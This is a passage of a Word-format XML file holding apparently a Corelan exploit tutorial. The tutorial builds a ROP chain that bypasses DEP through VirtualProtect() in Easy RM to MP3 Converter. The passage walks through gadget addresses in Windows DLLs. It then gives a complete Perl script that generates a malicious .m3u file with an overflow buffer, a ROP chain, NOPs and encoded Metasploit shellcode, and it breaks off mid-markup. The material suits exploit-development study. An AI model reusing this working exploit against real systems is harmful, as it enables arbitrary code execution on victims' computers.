        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This gadget will return to 0x77E84115, which will perform the following instructions :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4752975" cy="552450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="Image32" descr="">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a:hlinkClick r:id="rId103"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4752975" cy="552450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. It will write EAX (=0x0010F834) into the address contained in ESI, + 0x10.  ESI currently contains 0x0010F734.  At ESI+10 (0x0010F744), we have the placeholder for the return address :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2857500" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="Image33" descr="">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a:hlinkClick r:id="rId105"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2857500" cy="990600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the mov instruction is executed, we have successfully written our return address (pointer to nops) as parameter to the VirtualProtect() function :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2847975" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="Image34" descr="">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a:hlinkClick r:id="rId107"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2847975" cy="790575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. ESI will be saved in EAX, and some data from the stack is saved into ESI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Stage 3 : crafting the second parameter (lpAddress)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The second parameter needs to point at the location that needs to be marked executable. We will simply use the same pointer as the one used for the first parameter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This means that we can – more or less – repeat the entire sequence from stage 2, but before we can do this, we need to reset our start values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>At the current time, EAX still holds the initial saved stack pointer. We have to put it back in ESI. So we have to find a gadget that would do something like this : PUSH EAX, POP ESI, RET</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 xml:space="preserve">0x775D131E :  # PUSH EAX # POP ESI # RETN   [Module : ole32.dll] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Then, we have to increase the value in EAX again (add 0x100). We can use the same gadget as the one used to generate the value for parameter 1 again : 0x1002DC4C (ADD EAX,100 # POP EBP # RET)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Finally, we have to increase the value in ESI with 4 bytes, to make sure it will point to the next parameter. All we need is ADD ESI,4 + RET, or 4 times  INC ESI, RET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>I will use</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 xml:space="preserve">0x77157D1D :  # INC ESI # RETN   [Module : OLEAUT32.dll] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(4 times).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So, the updated sploit script will now look like this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 based exploit for Easy RM to MP3 Converter</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#written by corelanc0d3r - http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D7DF01"/>
        </w:rPr>
        <w:t>//www.corelan.be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$file= "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop.m3u</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$buffersize = 26094;</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$junk = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x $buffersize;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$eip=pack('V',0x100102DC); #return to stack</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$junk2 = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate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#------Put stack pointer in EDI &amp; EAX------------------------#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$rop=pack('V',0x5AD79277);  #PUSH ESP, POP EDI</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 = $rop.pack('V',0x77C1E842); #PUSH EDI, POP EAX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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate for POP EBP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#stack pointer is now in EAX &amp; EDI, now jump over parameters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$rop=$rop.pack('V',0x1001653D);  #ADD ESP,20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#-------Parameters for VirtualProtect()----------------------#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my $params=pack('V',0x7C801AD4);          #VirtualProtect()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WWWW</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">";   #return address (param1)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XXXX</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";   #lpAddress      (param2)</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YYYY</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">";   #Size           (param3)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ZZZZ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";   #flNewProtect   (param4)</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$params = $params.pack('V',0x10035005);  #writeable address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$params=$params.("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 8);  #padding</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ADD ESP,20 + RET will land here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change ESI so it points to correct location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to write first parameter (return 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my $rop2= pack('V',0x763C982F);  # XCHG ESI,EDI # DEC ECX # RETN 4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#-----Make eax point at shellcode--------------------------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$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP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#padding - compensate for RETN4 before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#padding</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#return address is in EAX - write parameter 1</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$rop2=$rop2.pack('V',0x77E84115);</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xml:space="preserve">"; #padding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#EAX now contains stack pointer</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#save it back to ESI first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$rop2=$rop2.pack('V',0x775D131E);  # PUSH EAX # POP ESI # RETN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#-----Make eax point at shellcode (again)--------------------------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$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP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#padding</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#increase ESI with 4</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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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#and write lpAddress (param 2)</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$rop2=$rop2.pack('V',0x77E84115);</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xml:space="preserve">"; #padding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$nops = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>\x90</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 240;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./msfpayload windows/messagebox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TITLE=CORELAN TEXT="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop test by corelanc0d3r</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">" R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 ./msfencode -e x86/alpha_mixed -t perl</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my $shellcode =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\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a</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\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59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\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41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\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42</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\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51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\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49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\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46</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\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c</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\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45</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\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48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\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47</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\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48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\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47</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\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e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\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49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\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48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\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49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\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49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\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e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\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a</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\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42</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\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44</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\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e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\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b</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\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51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\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43</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\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50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\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51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\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50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\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c</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\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48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\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e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\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b</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\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50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\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e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\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51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\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50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\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43</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\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43</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\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50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\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48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\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46</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\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e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\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45</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\x5a\x41\x41</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$rest = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 300;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$payload = $junk.$eip.$junk2.$rop.$params.$rop2.$nops.$shellcode.$rest;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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($payload)."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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($shellcode)."</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open($FILE,"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>&gt;$file</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$FILE $payload;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close($FILE);</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print "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>m3u File $file Created successfullyn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Stage 4 and 5 : third and fourth parameter (size and protection flag)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to create the third parameter, I decided to set the size to 0x300 bytes.  The gadgets we need to do this are XOR EAX,EAX  and   ADD EAX,100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The technique to write the resulting value as a parameter is exactly the same as with the other parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Save EAX into ESI </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Change EAX (XOR EAX,EAX : 0x100307A9, and then ADD EAX,100 + RET, 3 times in a row : 0x1002DC4C) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Increase ESI with 4 bytes </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Write EAX to ESI+0x10 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The fourth parameter (0x40) uses the same principle again :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Save EAX into ESI </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Set EAX to zero and then add 40  (XOR EAX,EAX + RET : 0x100307A9  /  ADD EAX,40 + RET : 0x1002DC41) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Increase ESI with 4 bytes </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Write EAX to ESI+0x10 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Final stage : jump to VirtualProtect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>All parameters are now written to the stack :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3895725" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="Image35" descr="">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a:hlinkClick r:id="rId109"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3895725" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>All we need to do now is find a way to make ESP point to the location where the pointer to VirtualProtect() is stored (directly followed by the arguments to that function), and somehow return to it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The current state of the registers is :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3048000" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="Image36" descr="">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a:hlinkClick r:id="rId111"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3048000" cy="1685925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
